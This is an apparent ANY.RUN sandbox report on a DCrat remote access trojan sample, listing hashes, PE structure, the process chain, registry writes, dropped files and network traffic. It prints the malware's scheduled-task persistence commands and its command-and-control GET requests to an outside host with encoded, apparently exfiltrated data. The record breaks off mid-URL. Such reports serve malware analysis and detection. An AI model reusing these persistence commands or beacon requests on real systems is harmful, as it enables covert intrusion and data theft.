File name: | b3fe05feed5ce43ecc5968a72467aff2.exe |
Full analysis: | https://app.any.run/tasks/d31275b5-51dd-4645-a69f-04bb3a6449a9 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | April 01, 2023, 04:31:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | B3FE05FEED5CE43ECC5968A72467AFF2 |
SHA1: | B1C47D779B4F6B579E28B47C64F1BADC8E0ACC5A |
SHA256: | 050F5866D9BCA42881CF88386BF408E30CA584B1B19030FA94B131E722DD4792 |
SSDEEP: | 24576:h2G/nvxW3WfkUJaFRxxLyRH7jR170gt1HL:hbA31UMFvx2hJ |
.exe | | | Win32 Executable (generic) (52.9) |
---|---|---|
.exe | | | Generic Win/DOS Executable (23.5) |
.exe | | | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 77824 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, 32-bit |
TimeStamp: | 2020:12:01 18:00:55+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x000051E8 | 0x00005200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.3888 |
.reloc | 0x00069000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.26192 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
11 | 3.2036 | 1094 | Latin 1 / Western European | English - United States | RT_STRING |
12 | 3.12889 | 358 | Latin 1 / Western European | English - United States | RT_STRING |
13 | 3.01704 | 338 | Latin 1 / Western European | English - United States | RT_STRING |
14 | 2.94627 | 266 | Latin 1 / Western European | English - United States | RT_STRING |
15 | 2.83619 | 188 | Latin 1 / Western European | English - United States | RT_STRING |
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1464 | "C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" | C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
2032 | "C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" | C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
1896 | "C:\Windows\System32\WScript.exe" "C:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbe" | C:\Windows\SysWOW64\wscript.exe | — | b3fe05feed5ce43ecc5968a72467aff2.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
1660 | C:\Windows\system32\cmd.exe /c ""C:\blockagentWincrt\OnRVU.bat" " | C:\Windows\SysWOW64\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
340 | "C:\blockagentWincrt\hostDhcpsvc.exe" | C:\blockagentWincrt\hostDhcpsvc.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
504 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1896 | schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
840 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1504 | schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\CBS\cmd.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1036 | schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\CBS\cmd.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2032) b3fe05feed5ce43ecc5968a72467aff2.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2032) b3fe05feed5ce43ecc5968a72467aff2.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2032) b3fe05feed5ce43ecc5968a72467aff2.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2032) b3fe05feed5ce43ecc5968a72467aff2.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (340) hostDhcpsvc.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (340) hostDhcpsvc.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | C:\blockagentWincrt\OnRVU.bat | text | |
MD5:A8D7E9F3DB5423AB33C4C97252E92DE6 | SHA256:BAB57932EB46F7496D17D548A0F41331D2B1EA9E01CD59A54E5A07684507F6E4 | |||
340 | hostDhcpsvc.exe | C:\Windows\IME\IMESC5\DICTS\69ddcba757bf72 | text | |
MD5:2A5C89319378DCC9A0C92361CEF8CEAD | SHA256:1E7494AE47811F75A044A6C8E7DED01541978B0A9390E2A069C06B944B28DA3C | |||
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | C:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbe | vbe | |
MD5:81DA2831BF2FEB8ACE4E74C87D1A8604 | SHA256:2A14D99C768A25A7DB8959C449BFE7AC039B4AF7CA6DDBF62E89A92F6C482676 | |||
340 | hostDhcpsvc.exe | C:\Windows\Logs\CBS\ebf1f9fa8afd6d | text | |
MD5:105A6089512FD7FFD5D304614F9EA01F | SHA256:D6F24271E2ECA62B5F175601271FBC356C3F7B4CCB26A46241EA1C9605A8F957 | |||
340 | hostDhcpsvc.exe | C:\found.000\7a0fd90576e088 | text | |
MD5:601AC9AE1296A7BDBB7B6071253ED84D | SHA256:F2715ACF480B4D31663A5E927991A58AF17A97A004A96573F0865D955A1A9D6F | |||
340 | hostDhcpsvc.exe | C:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\f3b6ecef712a24 | text | |
MD5:179EF856AD597B827333F661A4166FEE | SHA256:C135C265AD763423C1848B8DC0D05DB374200AF0FAF9E575A995D88C5EA222A9 | |||
340 | hostDhcpsvc.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\PTB\101b941d020240 | text | |
MD5:12867B8361CC58D8037C060D19B15E0A | SHA256:9A7CA44AD66B689F0011A9E0E64DC72E95245C5EEC24617C3B147866D9A8FE2C | |||
340 | hostDhcpsvc.exe | C:\found.000\explorer.exe | executable | |
MD5:82FA25A9FBEFD9602DD338788512903E | SHA256:2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC | |||
340 | hostDhcpsvc.exe | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\explorer.exe | executable | |
MD5:82FA25A9FBEFD9602DD338788512903E | SHA256:2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC | |||
340 | hostDhcpsvc.exe | C:\Users\admin\AppData\Local\Temp\sPGQ3IzL2i | text | |
MD5:9881633857A2797D79FE5B921FE65617 | SHA256:97B5B4CDCEC0EE6ECE92DEE3393034E325A35842D545E58774808AB34116C6B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&32e531e655eaad7c57fc0081c6a6bfd1=d1nI5oUaatmWH90dJpXT4V1RP1mRXxkMjRVWoFzQPxmRU1EdrRVW5FEVMhmW65ENJR0TsJ1RYNGbuNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0c3dkYxUTbPlWSYpleWZlYoZ1RkRlSDx0c4dFZ1BnaJ5WNXlVTxcVWsJ1MVl2dplEdGdlWw40MMBXWE9ENoNUS6Z1RiBnWHlEdG12YulTbjdXOp9kaKl2Tpd2RkhmQWJGaWdEZUp0QMl2a5JGcSdFZCJUeOVzY5FlQClXYsJFSihmVtV1bBlmYKJ0UaVHbHRVd4x2YjlzVhtmVYF1ZjR1Tu1UVRd2cXpFM4dVWspkRLdWVtJmdod0Y2p0MZBXMrlkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlWRqx0M0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI5ETNhNGZjBzY0E2Y2QWYwIWM0EDZ0EDM2MWY0MWZwEGNjZTYlNGZjJiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 2.13 Kb | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN&ca16cbf4abd5e18c7238ba2d26e37d1b=b38619f9986806ad85e919fe27d3506a&c046c2ee8690509603eb62347da0996c=wYmZDMxYTZ3UDO4IDMiNWY0YTYkJjY0AzM2kjMlFTN2MTNlZmMjZWY&OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN | RU | text | 2.13 Kb | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ET